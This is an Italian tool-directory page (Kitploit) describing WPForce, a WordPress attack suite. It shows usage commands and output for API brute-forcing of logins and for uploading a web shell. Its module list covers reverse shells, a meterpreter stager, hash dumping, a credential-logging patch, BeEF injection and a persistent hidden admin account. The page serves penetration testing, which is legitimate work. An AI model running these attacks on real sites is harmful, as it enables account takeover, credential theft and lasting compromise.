Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WPForce — Suite d'attacco per WordPress | Kitploit
Strumenti/GitHubGitHub/n00py/wpforce
Attacchi alle PasswordGenerazione di PayloadSfruttamento di Applicazioni WebPost-ExploitPenetration Testing
GitHubn00py/wpforce

WPForce

Suite d'attacco per WordPress

Vedi Repository
9792235 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

Supported Python versions

WPForce - Suite di attacco per Wordpress

DESCRIZIONE:

WPForce è una suite di strumenti di attacco per Wordpress. Attualmente contiene 2 script: WPForce, che esegue brute force sui login tramite API, e Yertle, che carica shell una volta trovate le credenziali di admin. Yertle contiene anche vari moduli di post-exploitation.

Per maggiori informazioni, visita il post sul blog qui: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

Blog in altre lingue:

Cinese - www.mottoin.com/100381.html

Portoghese - http://www.100security.com.br/wpforce/

Spagnolo - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

Russo - https://hackware.ru/?p=2547

Francese - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

Turco - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

CARATTERISTICHE:

  • Brute Force tramite API, non tramite form di login, bypassando alcune forme di protezione
  • Può caricare automaticamente una shell interattiva
  • Può essere usato per generare una reverse shell completa
  • Scarica gli hash delle password di WordPress
  • Può backdoorare la funzione di autenticazione per raccogliere password in chiaro
  • Inietta il hook di BeEF in tutte le pagine
  • Pivot verso meterpreter se necessario

INSTALLAZIONE:

root@kitploit:~
Yertle richiede la libreria requests per funzionare.
http://docs.python-requests.org/en/master/user/install/

UTILIZZO:

root@kitploit:~
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Strumento di attacco brute force per Wordpress
 =(  _____||________|                 ~n00py~

Lista utenti: usr.txt (3)
Lista password: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] sono credenziali valide!  - QUESTO ACCOUNT È ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] sono credenziali valide!
--------------------------
 100% Completato
Tutte le coppie corrette:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

 -h, --help            mostra questo messaggio di aiuto ed esci
  -i INPUT, --input INPUT
                        Nome del file di input
  -w WORDLIST, --wordlist WORDLIST
                        Nome del file di wordlist
  -u URL, --url URL     URL del target
  -v, --verbose         Output verboso. Mostra i tentativi mentre avvengono.
  -t THREADS, --threads THREADS
                        Determina il numero di thread da usare, default è 10
  -a AGENT, --agent AGENT
                        Determina lo user-agent
  -d, --debug           Questa opzione è usata per determinare problemi con lo script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Modulo di post-exploitation per Wordpress

Backdoor caricata!
Directory di upload: ebwhbas
os-shell>



  -h, --help            mostra questo messaggio di aiuto ed esci
  -i, --interactive     Shell interattiva
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL del target
  -u USERNAME, --username USERNAME
                        Nome utente admin
  -p PASSWORD, --password PASSWORD
                        Password admin
  -li IP, --ip IP       IP dell'ascoltatore
  -lp PORT, --port PORT
                        Porta dell'ascoltatore
  -v, --verbose         Output verboso.
  -e EXISTING, --existing EXISTING
                        Salta il caricamento di una shell e si connette a una shell esistente


Yertle attualmente contiene questi moduli:

root@kitploit:~
Comandi principali
=============
 
Comando                   Descrizione
-------                   -----------
?                         Menu di aiuto
beef                      Inietta un hook BeEF nel sito web
dbcreds                   Stampa le credenziali del database
exit                      Termina la sessione
hashdump                  Scarica tutti gli hash delle password di WordPress
help                      Menu di aiuto
keylogger                 Patcha il core di WordPress per registrare credenziali in chiaro
keylog                    Mostra il file keylog
meterpreter               Esegue uno stager PHP meterpreter per connettersi a metasploit
persist                   Crea un account admin che si riaggiungerà
quit                      Termina la sessione
shell                     Invia una reverse shell TCP a un listener netcat
stealth                   Nasconde Yertle dalla pagina dei plugin
Scarica lo strumento